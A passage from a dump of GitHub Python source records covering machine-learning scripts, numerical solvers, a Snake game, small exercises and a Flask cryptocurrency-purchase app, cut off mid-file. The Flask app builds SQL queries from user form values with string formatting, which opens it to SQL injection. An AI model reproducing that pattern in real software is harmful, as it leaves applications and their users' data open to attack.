tf.reshape(x, (1, 1, -1))\n return tf.exp(-((self.yy - y) ** 2 + (self.xx - x) ** 2) / (2 * self.sigma ** 2))\n\n x = tf.map_fn(batch_map, x, dtype='float32')\n print (x.shape)\n return x\n\n def compute_output_shape(self, input_shape):\n print (input_shape)\n return tuple([input_shape[0], self.image_size[0], self.image_size[1], input_shape[1]])\n\n def get_config(self):\n config = {\"sigma\": self.sigma, \"image_size\": self.image_size}\n base_config = super(GaussianFromPointsLayer, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n","repo_name":"huangleiBuaa/StochasticityBW","sub_path":"SBW_GAN_TF/gan/layers/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"37352419145","text":"# -*- coding:utf-8 -*-\nimport pandas as pd\nimport glob\nimport numpy as np\nfrom sklearn import metrics\n\nif __name__ == '__main__':\n files = glob.glob(\"/data2/code/DaguanFengxian/ensemble_learn/model_pred/*.csv\")\n df = None\n for f in files:\n if df is None:\n df = pd.read_csv(f)\n else:\n temp_df = pd.read_csv(f)\n df = df.merge(temp_df, on='id', how='left')\n\n print(df.head(10))\n target = df.sentiment.values\n pred_cols = ['lr_pred', 'lr_cnt_pred', 'rf_svd_pred']\n\n for col in pred_cols:\n auc = metrics.roc_auc_score(target, df[col].values)\n print(f\"{col}, overall_auc={auc}\")\n\n print(\"average\")\n avg_pred = np.mean(df[[\"lr_pred\", \"lr_cnt_pred\", \"rf_svd_pred\"]].values, axis=1)\n print(metrics.roc_auc_score(target, avg_pred))\n\n print(\"weight average\")\n lr_pred = df.lr_pred.values\n lr_cnt_pred = df.lr_cnt_pred.values\n rf_svd_pred = df.rf_svd_pred.values\n avg_pred = (3 * lr_pred + lr_cnt_pred + rf_svd_pred) / 5\n print(metrics.roc_auc_score(target, avg_pred))\n\n print(\" rank average\")\n lr_pred = df.lr_pred.rank().values\n lr_cnt_pred = df.lr_cnt_pred.rank().values\n rf_svd_pred = df.rf_svd_pred.rank().values\n avg_pred = (lr_pred + lr_cnt_pred + rf_svd_pred) / 3\n print(metrics.roc_auc_score(target, avg_pred))\n\n print(\"weight rank average\")\n lr_pred = df.lr_pred.rank().values\n lr_cnt_pred = df.lr_cnt_pred.rank().values\n rf_svd_pred = df.rf_svd_pred.rank().values\n avg_pred = (3 * lr_pred + lr_cnt_pred + rf_svd_pred) / 5\n print(metrics.roc_auc_score(target, 
avg_pred))\n","repo_name":"Coding-Zuo/DaguanFengxian","sub_path":"ensemble_learn/blending.py","file_name":"blending.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"24483841130","text":"\r\n##square will be defined by [[a,b],[c,d]]\r\n##a will spawn the larger square\r\n##b will spawn the smaller square\r\n##c was attached to the previous big square\r\n##d was attached the the brother square\r\n##a,b,c,d are all pairs (x,y)\r\n\r\nimport math\r\n\r\ndef pairAdd(x,y):\r\n return (x[0]+y[0],x[1]+y[1])\r\n\r\ndef pairSub(x,y):\r\n return (x[0]-y[0],x[1]-y[1])\r\n\r\ndef matMult(mat,x):\r\n return (mat[0][0]*x[0]+mat[0][1]*x[1],mat[1][0]*x[0]+mat[1][1]*x[1])\r\n\r\ndef checkUp(square):\r\n spawners = square[0]\r\n return max([p[1] for p in spawners])\r\n\r\ndef checkDown(square):\r\n spawners = square[0]\r\n return min([p[1] for p in spawners])\r\n\r\ndef checkRight(square):\r\n spawners = square[0]\r\n return max([p[0] for p in spawners])\r\n\r\ndef checkLeft(square):\r\n spawners = square[0]\r\n return min([p[0] for p in spawners])\r\n\r\ndef spawn(square):\r\n s = square[0]\r\n dx = s[1][0]-s[0][0]\r\n dy =s[1][1]-s[0][1]\r\n L=math.sqrt(dx**2+dy**2)\r\n mat = [[dx/L,-dy/L],[dy/L,dx/L]]\r\n newPoint = pairAdd(s[0], matMult(mat,(16/25*L,12/25*L)) )\r\n dx1 =newPoint[0] -s[0][0]\r\n dy1 =newPoint[1] -s[0][1]\r\n newSB = [[pairAdd(s[0],(-dy1,dx1)),pairAdd(newPoint,(-dy1,dx1))],[s[0],newPoint]]\r\n\r\n dx2 =s[1][0]-newPoint[0] \r\n dy2 =newPoint[1] -s[1][1]\r\n \r\n newSS = [[pairAdd(newPoint,(dy2,dx2)),pairAdd(s[1],(dy2,dx2))],[newPoint,s[1]]]\r\n return [newSB,newSS]\r\n \r\n\r\ncurrent = 1\r\n\r\nchange=1\r\n\r\nsquares = [[[(0,1),(1,1)],[(0,0),(1,0)]]]\r\ncounter = 0\r\n\r\nfor i in range(10):\r\n newSquares = []\r\n for s in squares:\r\n s2 = spawn(s)\r\n newSquares.append(s2[0])\r\n newSquares.append(s2[1])\r\n squares = newSquares\r\n\r\n\r\nwhile change > 10**(-11):\r\n upMost = []\r\n upness= 0\r\n downMost = []\r\n downness= 100\r\n leftMost = []\r\n leftness = 0\r\n rightMost = []\r\n rightness = 0\r\n \r\n for s in squares:\r\n s2 = spawn(s)\r\n up1 = checkUp(s2[0])\r\n up2 = checkUp(s2[1])\r\n down1 = checkDown(s2[0])\r\n down2 = checkDown(s2[1])\r\n right1 = checkRight(s2[0])\r\n right2 = checkRight(s2[1])\r\n left1 = checkLeft(s2[0])\r\n left2 = checkLeft(s2[1])\r\n if up1 > upness:\r\n upMost = s2[0]\r\n upness=up1\r\n if up2 > upness:\r\n upMost = s2[1]\r\n upness=up2\r\n if down1 < downness:\r\n downMost = s2[0]\r\n downness=down1\r\n if down2 < downness:\r\n downMost = s2[1]\r\n downness=down2\r\n if right1 > rightness:\r\n rightMost = s2[0]\r\n rightness=right1\r\n if right2 > rightness:\r\n rightMost = s2[1]\r\n rightness=right2\r\n if left1 < leftness:\r\n leftMost = s2[0]\r\n leftness=left1\r\n if left2 < leftness:\r\n leftMost = s2[1]\r\n leftness=left2\r\n squares = [upMost,downMost,leftMost,rightMost]\r\n\r\n area = (upness-min(0,downness))*(rightness-leftness)\r\n change = abs(area - current)\r\n current = area\r\n\r\n\r\nprint(current)\r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 395.py","file_name":"problem 395.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12568262855","text":"import QtType\r\n\r\n\r\nclass Render:\r\n def __init__(self, stylesheet: str):\r\n self.env = {}\r\n 
try:\r\n with open(stylesheet, \"r+\", encoding=\"utf8\") as f:\r\n s = f.read()\r\n try:\r\n l_env = {}\r\n exec(s, l_env)\r\n if isinstance(l_env.get(\"__ALL__\", None), dict):\r\n self.env.update(l_env[\"__ALL__\"])\r\n except Exception as e:\r\n print(\"exec \", stylesheet, \"failed, E: \", e)\r\n except FileNotFoundError:\r\n pass\r\n # print(\"use render script\", self.env)\r\n\r\n def do_render(self, src: str, dst: str):\r\n print(\"render \", src, \" to \", dst)\r\n ori_s = None\r\n with open(src, \"r\", encoding=\"utf-8\") as f:\r\n ori_s = f.read()\r\n if ori_s is None:\r\n raise Exception(\"open {0} failed !\\n\".format(src))\r\n qt_obj = QtType.QtUiObject.loads(ori_s)\r\n\r\n for k, v in self.env.items():\r\n self.render_stylesheet_by_format(qt_obj, k, v)\r\n\r\n qt_obj.dump(dst)\r\n return True\r\n\r\n @staticmethod\r\n def render_stylesheet_by_format(obj: QtType.QtUiObject, obj_marker: str,\r\n fmt_style: str, marker_key: str = \"whatsThis\"):\r\n fmt_style = QtType.QtStyleSheet(fmt_style)\r\n\r\n for item in obj.gen_obj_by_marker(obj_marker, marker_key):\r\n inst_style = QtType.QtStyleSheet(item.styleSheet.content())\r\n for k, v in fmt_style.items():\r\n if isinstance(v, dict):\r\n if inst_style.get(k, None) is None:\r\n inst_style[k] = {}\r\n for sub_k, sub_v in v.items():\r\n inst_sub_v = inst_style[k].get(sub_k, None)\r\n if inst_sub_v is None:\r\n continue\r\n assert isinstance(sub_v, str)\r\n inst_style[k][sub_k] = sub_v\r\n elif isinstance(v, str):\r\n if inst_style.get(k, None) is None: # 不允许{}外部添加属性\r\n continue\r\n inst_style[k] = v\r\n else:\r\n raise Exception(\"not support type {0} of {1}\".format(type(v), k))\r\n\r\n item.styleSheet.set(\"string\", inst_style.to_string())\r\n\r\n","repo_name":"closesakuya/QtUiFileRender","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8662121928","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n\nclass ParabolicTypeEquations:\n def __init__(self, func, phi_0, phi_l, xi, x, t, a, N=100):\n self.func = func\n self.phi_0 = phi_0\n self.phi_l = phi_l\n self.xi = xi\n self.x = x\n self.t = t\n self.N = N\n self.h = (x[-1] - x[1]) / N\n self.tau = (t[-1] - t[1]) / N\n self.sigma = a * a * self.tau / self.h / self.h\n\n # Точное решение\n def exact_solution(self):\n return np.array([[self.func(x, t) for t in self.t] for x in self.x])\n\n # Явная конечно-разностная схема\n def explicit_finite_difference_scheme(self):\n u = [[0 for j in range(len(self.t))] for i in range(len(self.x))]\n\n for j in range(len(self.x)):\n u[j][0] = self.xi(self.x[j])\n\n for k in range(len(self.t) - 1):\n u[0][k + 1] = self.phi_0(self.t[k + 1])\n\n for k in range(len(self.t) - 1):\n u[-1][k + 1] = self.phi_l(self.t[k + 1])\n\n for j in range(1, len(self.x) - 1):\n for k in range(len(self.t) - 1):\n u[j][k + 1] = self.sigma * u[j + 1][k] + (1 - 2 * self.sigma) * u[j][k] + self.sigma * u[j - 1][k]\n\n return u\n\n # Неявная схема\n def implicit_finite_difference_scheme(self):\n u = [[0 for j in range(len(self.t))] for i in range(len(self.x))]\n\n for k in range(len(self.t) - 1):\n u[0][k + 1] = self.phi_0(self.t[k + 1])\n\n for k in range(len(self.t) - 1):\n u[-1][k + 1] = self.phi_l(self.t[k + 1])\n\n for j in range(len(self.x)):\n u[j][0] = self.xi(self.x[j])\n\n for k in range(len(self.t) - 1):\n A = [self.sigma if i != 0 else 0 for i in range(self.N - 2)]\n B = [-(1 + 2 * 
self.sigma) for i in range(self.N - 2)]\n C = [self.sigma if i != self.N - 3 else 0 for i in range(self.N - 2)]\n D = [-u[j][k] for j in range(2, self.N - 2)]\n D.insert(0, -(u[1][k] + self.sigma * self.phi_0(self.t[k + 1])))\n D.append(-(u[self.N - 1][k] + self.sigma * self.phi_l(self.t[k + 1])))\n\n uk = self.progonka(A, B, C, D)\n for j in range(1, self.N - 1):\n u[j][k + 1] = uk[j - 1]\n\n return u\n\n # Явно-неявня схема\n def explicit_implicit_finite_difference_scheme(self, teta):\n u = [[0 for j in range(len(self.t))] for i in range(len(self.x))]\n\n for k in range(len(self.t) - 1):\n u[0][k + 1] = self.phi_0(self.t[k + 1])\n\n for k in range(len(self.t) - 1):\n u[-1][k + 1] = self.phi_l(self.t[k + 1])\n\n for j in range(len(self.x)):\n u[j][0] = self.xi(self.x[j])\n\n for k in range(len(self.t) - 1):\n A = [teta * self.sigma if i != 0 else 0 for i in range(self.N - 2)]\n B = [-(1 + 2 * teta * self.sigma) for i in range(self.N - 2)]\n C = [teta * self.sigma if i != self.N - 3 else 0 for i in range(self.N - 2)]\n D = [- (1 - teta) * self.sigma * u[j + 1][k] - (1 - 2 * (1 - teta) * self.sigma) * u[j][k] - (\n 1 - teta) * self.sigma * u[j - 1][k] for j in range(2, self.N - 2)]\n D.insert(0, -(teta * self.sigma * self.phi_0(self.t[k + 1]) + (1 - teta) * self.sigma * u[2][k] + (\n 1 - 2 * (1 - teta) * self.sigma) * u[1][k] + (1 - teta) * self.sigma * self.phi_0(self.t[k])))\n D.append(-(teta * self.sigma * self.phi_l(self.t[k + 1]) + (1 - teta) * self.sigma * self.phi_l(self.t[k]) + (\n 1 - 2 * (1 - teta) * self.sigma) * u[self.N - 1][k] + (1 - teta) * self.sigma * u[self.N - 2][\n k]))\n\n uk = self.progonka(A, B, C, D)\n\n for j in range(1, self.N - 1):\n u[j][k + 1] = uk[j - 1]\n\n return u\n\n def progonka(self, a, b, c, d):\n n = len(a)\n for i in range(n):\n if math.fabs(b[i]) < math.fabs(a[i]) + math.fabs(c[i]):\n raise Exception\n\n # Формирование массивов P, Q (Расчет значений) ((Прямой ход))\n\n P, Q = [-c[0] / b[0]], [d[0] / b[0]]\n\n for i in range(1, n):\n P.append(-c[i] / (b[i] + a[i] * P[i - 1]))\n Q.append((d[i] - a[i] * Q[i - 1]) / (b[i] + a[i] * P[i - 1]))\n\n # Вычисление решения системы (Обратный ход)\n x = [Q[n - 1]]\n for i in range(1, n):\n x.append(P[n - 1 - i] * x[i - 1] + Q[n - 1 - i])\n\n return list(reversed(x))\n\n\ndef main():\n a = 0.01\n\n U = lambda x, t: np.exp(-a * t) * np.cos(x)\n\n phi_0 = lambda t: math.exp(-a * t)\n phi_l = lambda t: -math.exp(-a * t)\n xi = lambda x: math.cos(x)\n\n N = 100\n X = np.linspace(0, 3, N)\n T = np.linspace(0, math.pi, N)\n\n equations = ParabolicTypeEquations(U, phi_0, phi_l, xi, X, T, a)\n\n fig = plt.figure(figsize=(20, 12))\n ax = fig.add_subplot(1, 4, 1, projection='3d')\n ax.set_title('Точное решение')\n\n u = equations.exact_solution()\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n\n ax = fig.add_subplot(1, 4, 2, projection='3d')\n ax.set_title('Явная схема')\n\n u = equations.explicit_finite_difference_scheme()\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n print('Явная схема: средкв ошибка:',\n math.sqrt(sum([sum([(U(X[i], T[j]) - u[i][j]) ** 2 for j in range(len(T))]) for i in range(len(X))])))\n\n ax = fig.add_subplot(1, 4, 3, projection='3d')\n ax.set_title('Неявная схема')\n\n u = equations.implicit_finite_difference_scheme()\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n 
ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n print('Неявная схема: средкв ошибка:',\n math.sqrt(sum([sum([(U(X[i], T[j]) - u[i][j]) ** 2 for j in range(len(T))]) for i in range(len(X))])))\n\n ax = fig.add_subplot(1, 4, 4, projection='3d')\n ax.set_title('Явно-неявная схема')\n\n u = equations.explicit_implicit_finite_difference_scheme(1 / 2)\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n print('Явно-неявная схема: средкв ошибка:',\n math.sqrt(sum([sum([(U(X[i], T[j]) - u[i][j]) ** 2 for j in range(len(T))]) for i in range(len(X))])))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pivovarov-mai/80-409b-19","sub_path":"gordionok/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":6841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8940585530","text":"import pygame\nimport random\nimport neat\nimport os\nfrom resources.reference import *\nfrom resources.util import *\nfrom gamesrc.grid import Grid\nfrom gamesrc.snake import Snake\nfrom gamesrc.food import Food\n\n\ndef has_failed(snake):\n \"\"\"\n This function checks to see if the snake has met any of the fail conditions.\n Since the grid is a standard 30 by 30 grid, the grid object is not required\n to check extremes.\n\n Arguments:\n snake {Snake} -- The snake whose status is to be found.\n\n Returns:\n boolean -- true if it has met a fail condition and False otherwise.\n \"\"\"\n x, y = snake.coords[0][0], snake.coords[0][1]\n\n # Did it hit its own body?\n if ((x, y) in snake.coords[1:]):\n return True\n elif x < 0 or x > 29 or y < 0 or y > 29: # Did it go outside the grid?\n return True\n else:\n return False\n\n\ndef draw(window, snake, food, score):\n \"\"\"\n This function draws and updates the pygame window with the given information.\n\n Arguments:\n window {Surface} -- The active PyGame window\n snake {Snake} -- The snake in the game\n food {Food} -- The food in the game\n score {int} -- The current score\n \"\"\"\n\n global ANIMATION_TICK\n ANIMATION_TICK -= 1 # Used to change food color\n\n window.fill((0, 0, 51))\n\n # Food color changing and drawing is handled here\n if ANIMATION_TICK == 0:\n global FOOD_RGB\n FOOD_RGB = (\n random.randrange(\n 50, 255), random.randrange(\n 50, 255), random.randrange(\n 50, 255))\n FOOD_IMG.fill(FOOD_RGB)\n ANIMATION_TICK = 25\n else:\n window.blit(FOOD_IMG, (food.x * 15, food.y * 15))\n\n # Draw snake\n for i, coord in enumerate(snake.coords):\n x = coord[0] * 15\n y = coord[1] * 15\n\n if i == 0:\n head = pygame.Surface((15, 15))\n head.fill((255, 255, 255))\n WINDOW.blit(head, (x, y))\n else:\n WINDOW.blit(SNAKE_IMG, (x, y))\n\n # Draw Score\n score_txt = STAT_FONT.render(\"Score: \" + str(score), 1, (255, 255, 255))\n window.blit(\n score_txt,\n (WIN_WIDTH - 10 - score_txt.get_width(), 10)) # top right of screen\n\n pygame.display.update()\n\n\ndef main():\n \"\"\"This function runs the game for humans.\n \"\"\"\n\n global FOOD_RGB # Food needs RGB too\n grid = Grid()\n snake = Snake()\n food = generate_food(grid, snake)\n score = 0\n\n isRunning = True\n while isRunning:\n game_clock.tick(17)\n\n move = None\n for event in pygame.event.get():\n # Handle Quittiing\n if event.type == pygame.QUIT:\n isRunning = False\n pygame.quit()\n quit()\n\n # Check for key presses\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n move = \"L\"\n elif 
event.key == pygame.K_RIGHT:\n move = \"R\"\n\n # Moves ahead if you didn't choose a move\n if move is None:\n snake.tick(grid)\n else:\n snake.move(grid, move)\n\n # Check if snake collided with the food\n if snake.collide(food):\n score += 1\n snake.elongate(grid)\n\n # Fancy color changing for snake :)\n SNAKE_IMG.fill(FOOD_RGB)\n\n food = generate_food(grid, snake)\n\n # Stop running in case\n if has_failed(snake):\n isRunning = False\n break\n\n draw(WINDOW, snake, food, score)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Adi-UA/AI-Plays-Snake","sub_path":"snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72851398952","text":"# Remove all elements from a linked list of integers that have value val.\n\n# Have you met this question in a real interview? Yes\n# Example\n# Given 1->2->3->3->4->5->3, val = 3, you should return the list as 1->2->4->5\n\nfrom ListNode import ListNode\n\ndef removeLinkedListElements(head, val):\n if head == None or val == None:\n return head\n dummy = ListNode(0)\n dummy.next = head\n head = dummy\n while head.next != None:\n if head.next.val == val:\n head.next = head.next.next\n else:\n head = head.next\n return dummy.next\n\nhead = ListNode.arrayToList([1, 2, 3, 3, 4, 5, 3])\nListNode.printList(removeLinkedListElements(head, 3))\n\n","repo_name":"cutewindy/CodingInterview","sub_path":"LintCode_Python/removeLinkedListElements.py","file_name":"removeLinkedListElements.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40580319618","text":"#-*- coding:utf-8\nimport pandas as pd\nimport os\n \n##########需要转换的csv文件###########\npath_dir = './'\ncsvPath = path_dir + 'train_labels.csv'\nif not os.path.exists(csvPath):\n print('Not that files:%s'%csvPath)\n \n'''\npandas.read_csv() 报错 OSError: Initializing from file failed,\n一种是函数参数为路径而非文件名称,另一种是函数参数带有中文。\n'''\n##########转换成txt文件###########\ntxtPath = path_dir+'train_labels.txt'\ndata = pd.read_csv(csvPath, encoding='utf-8')\n \nwith open(txtPath,'a+', encoding='utf-8') as f:\n for line in data.values:\n f.write((str(line[0])+'\\t'+str(line[1])+','+str(line[2])+'\\t'+str(line[4])+','+str(line[5])+','+str(line[6])+','+str(line[7])+'\\t'+str(line[3])+'\\n'))\n","repo_name":"cassie1728/hand-detection-with-egodata","sub_path":"data_deal/csv2txt.py","file_name":"csv2txt.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13478529361","text":"weight = 41.5\n\n# Ground Shipping\nflat_rate_ground = 20.00\nif weight <= 2:\n cost_ground = flat_rate_ground + 1.5 * weight\nelif weight > 2 and weight <= 6:\n cost_ground = flat_rate_ground + 3 * weight\nelif weight > 6 and weight <= 10:\n cost_ground = flat_rate_ground + 4 * weight\nelse:\n cost_ground = flat_rate_ground + 4.75 * weight\n\nprint(\"Ground Shipping cost: ${0}\".format(cost_ground))\n\n# Ground Shipping Premium\ncost_ground_premium = 125\n\nprint(\"Ground Shipping Premium cost: ${0}\".format(cost_ground_premium))\n\n# Drone Shipping\nif weight <= 2:\n cost_drone = 4.5 * weight\nelif weight > 2 and weight <= 6:\n cost_drone = 9 * weight\nelif weight > 6 and weight <= 10:\n cost_drone = 12 * weight\nelse:\n cost_drone = 14.25 * weight\n\nprint(\"Drone Shipping cost: 
${0}\".format(cost_drone))\n","repo_name":"pedrolrc/python3_codecademy_course","sub_path":"modules/02_control_flow/03-project-sals_shipping.py","file_name":"03-project-sals_shipping.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32645403346","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport sys\nimport os\n\nimport numpy as np\n\nsys.path.append(\"..\")\nfrom data_augmentation import rotate\n\n\ndef read_and_decode(filename_queue,\n batch_size):\n \"\"\"\n Create a queue for the task of visualizing embedding\n Only return the caption and the true image\n :param filename_queue: All filenames\n :param batch_size: Size of the batch\n :return:\n \"\"\"\n # Create a tfRecordReader\n reader = tf.TFRecordReader()\n\n # Read a single example\n _, image_file = reader.read(filename_queue)\n\n # All fixed length features\n context_features = {\n \"img\": tf.FixedLenFeature([], tf.string)\n }\n\n # For ease of use, I used sequential features even if I knew the length\n sequence_features = {}\n for index in range(5):\n sequence_features[\"caption{}\".format(index)] = tf.VarLenFeature(dtype=tf.float32)\n\n # Parse the example\n context_parsed, sequence_parsed = tf.parse_single_sequence_example(\n serialized=image_file,\n context_features=context_features,\n sequence_features=sequence_features\n )\n\n # Decode the raw float image\n image = tf.decode_raw(context_parsed[\"img\"], tf.uint8)\n # Reshape the image. Here the number of channel varies between sample\n # Some images are 1D channel, some other are 3D\n image = tf.reshape(image, (64, 64, -1))\n image_unit32 = 2 * tf.image.convert_image_dtype(image, dtype=tf.float32) - 1\n\n # image_unit32 = tf.image.rgb_to_hsv(image)\n # If number of channel is 1 -> modify to rgb scale\n image_unit32 = tf.cond(pred=tf.equal(tf.shape(image_unit32)[2], 3),\n fn1=lambda: image_unit32,\n fn2=lambda: tf.image.grayscale_to_rgb(image_unit32))\n\n # Need to define the true shape\n image_unit32.set_shape((64, 64, 3))\n # image_unit32 = rotate(image_unit32, 30)\n\n min_queue_examples = 256 # Shuffle elements\n\n # Because I know the true shape, I don't need sparse tensor (introduced by the use of sequence_features)\n # so i transform them to dense vector + reshape them\n caption0 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption0\"]), (4800, 1))\n caption1 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption1\"]), (4800, 1))\n caption2 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption2\"]), (4800, 1))\n caption3 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption3\"]), (4800, 1))\n caption4 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption4\"]), (4800, 1))\n\n inputs = [image_unit32,\n caption0,\n caption1,\n caption2,\n caption3,\n caption4,\n ]\n images = tf.train.batch(\n inputs,\n batch_size=batch_size,\n capacity=min_queue_examples + 3 * batch_size)\n return images\n\n\nif __name__ == '__main__':\n\n batch_size = 4\n writer_filename = [os.path.join(\"..\", \"examples\", \"train{}.tfrecords\".format(i)) for i in range(3, 4)]\n filename_queue = tf.train.string_input_producer(\n writer_filename)\n images = read_and_decode(filename_queue, batch_size)\n with tf.Session() as sess:\n group = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n sess.run(group)\n coord = tf.train.Coordinator()\n tf.train.start_queue_runners(sess=sess)\n for i in 
range(1000):\n out = sess.run(images)\n\n for b in range(batch_size):\n ou = out[0][b]\n print(np.mean(ou))\n print(np.max(ou))\n print(np.min(ou))\n","repo_name":"louishenrifranc/ImageFilling","sub_path":"test/test_data_augmentation.py","file_name":"test_data_augmentation.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35757668874","text":"from the_app import app\nfrom the_app.form import CompraForm\nfrom flask import render_template, request, redirect, url_for\nfrom requests import Request, Session\nfrom datetime import datetime\n\nimport requests, sqlite3,json\n\n\n@app.route(\"/\")\ndef index():\n\tconn = sqlite3.connect(app.config['BASE_DATOS'])\n\tcur = conn.cursor()\n\n\thayregistros = \"SELECT * FROM compras\"\n\tregistros=cur.execute(hayregistros).fetchall()\n\t\n\ttry:\n\t\tif len(registros) == 0:\n\t\t\t\treturn render_template('sinmovimientos.html')\n\t\t\t\t\t\n\t\telse:\t\n\t\t\t\tquery = \"SELECT date,time,from_currency,from_quantity,to_currency,to_quantity,P_U from compras\"\n\t\t\t\tmovimientos= cur.execute(query).fetchall()\n\t\t\t\treturn render_template('movimientos.html', movimientos=movimientos)\n\texcept Exception as e:\n\t\t\t\terror_acceso = ('Se ha producido un error de acceso a la base de datos: {}'.format(e))\n\t\t\t\treturn render_template('movimientos.html', acceso_base_datos= error_acceso)\n\n\tconn.close()\n\n\n@app.route(\"/purchase\", methods=['GET','POST'])\ndef purchase():\n\t\n\tnow = datetime.now()\n\ttime = str(now.time())\n\ttime = time[0:8]\n\n\tform = CompraForm(request.form)\n\n\tif request.method == 'GET':\n\t\treturn render_template('compras.html', form=form)\n\n\telif request.form.get('rechazar'):\n\t\t\treturn redirect(url_for(\"index\"))\n\n\t\n\telse:\n\t\tif request.form.get('calcular'):\n\t\t\tif form.validate():\n\t\t\t\tAPY = app.config['APY_KEY']\n\t\t\t\tURL = 'https://pro-api.coinmarketcap.com/v1/tools/price-conversion?amount={}&symbol={}&convert={}&CMC_PRO_API_KEY={}'\n\t\t\t\trespuesta = requests.get(URL.format(request.values.get('Q_Form'), request.values.get('MonedaFrom'), request.values.get('MonedaTo'),APY))\n\t\t\t\t\n\t\t\t\t#try:\n\t\t\t\tif respuesta.status_code == 200:\n\t\t\t\t\tjson = respuesta.json()\n\t\t\t\n\t\t\t\t\tprice =json.get('data').get('quote').get(request.values.get('MonedaTo'))['price']\n\t\t\t\t\tcantidad = request.values.get('Q_Form')\n\t\t\t\t\n\t\t\t\t\tprice = float(price) \n\t\t\t\t\tcantidad = float(cantidad)\n\n\t\t\n\t\t\t\t\tprecio_unitario = price/cantidad\n\n\t\t\t\t\tform.Q_to.data = price\n\t\t\t\t\tform.P_U.data = precio_unitario\n\n\t\t\t\t\tprice = round(price, 8)\n\t\t\t\t\tprecio_unitario = round(precio_unitario, 8)\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\treturn render_template('compras.html',form=form, price=price, precio_unitario=precio_unitario)\n\t\t\t\t\n\t\t\t\t#except Exception as e:\n\t\t\t\telse:\n\t\t\t\t\terror_api = ('Se ha producido un error al consultar el valor actual de su moneda. 
Inténtelo de nuevo o contacte con el administrador') \n\t\t\t\t\tprint(\"Error de consulta en API:\", respuesta.status_code, respuesta.text)\n\t\t\t\t\treturn render_template('compras.html', form=form, acceso_error_api= error_api)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\treturn render_template('compras.html',form=form)\n\t\t\n\t\telif request.form.get('rechazar'):\n\t\t\treturn redirect(url_for(\"index\"))\n\n\t\telse:\n\t\t\t\t\tif form.Q_to.data == '':\n\t\t\t\t\t\t error = ('Por favor, pulsa el botón \"CAL\" para poder calcular el precio')\n\t\t\t\t\t\t return render_template('compras.html', form=form, calculaPrecio=error)\n\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tif form.validate():\t\t\n\t\n\t\t\t\t\t\t\tconn = sqlite3.connect(app.config['BASE_DATOS'])\n\t\t\t\t\t\t\tcur = conn.cursor()\n\n\t\t\t\t\t\t\tSaldo = \"SELECT sum(to_quantity) from compras WHERE from_quantity !='EUR' and from_quantity = '{}'\".format(request.values.get('MonedaFrom'))\n\t\t\t\t\t\t\tcantidadFrom=cur.execute(Saldo).fetchall()\n\t\t\t\t\t\t\tsaldoFrom = cantidadFrom[0]\n\n\t\t\t\t\t\t\tSaldo = \"SELECT sum(to_currency) from compras WHERE from_currency != 'EUR' and from_currency = '{}'\".format(request.values.get('MonedaFrom'))\n\t\t\t\t\t\t\tcantidadTo=cur.execute(Saldo).fetchall()\n\t\t\t\t\t\t\tsaldoTo = cantidadTo[0]\n\n\t\t\t\t\t\t\thayMoneda = \"SELECT from_quantity from compras WHERE from_quantity = '{}'\".format(request.values.get('MonedaFrom'))\n\t\t\t\t\t\t\tmonedas\t= cur.execute(hayMoneda).fetchall()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif request.values.get('MonedaFrom') == 'EUR':\n\n\t\t\t\t\t\t\t\tquery = \"INSERT 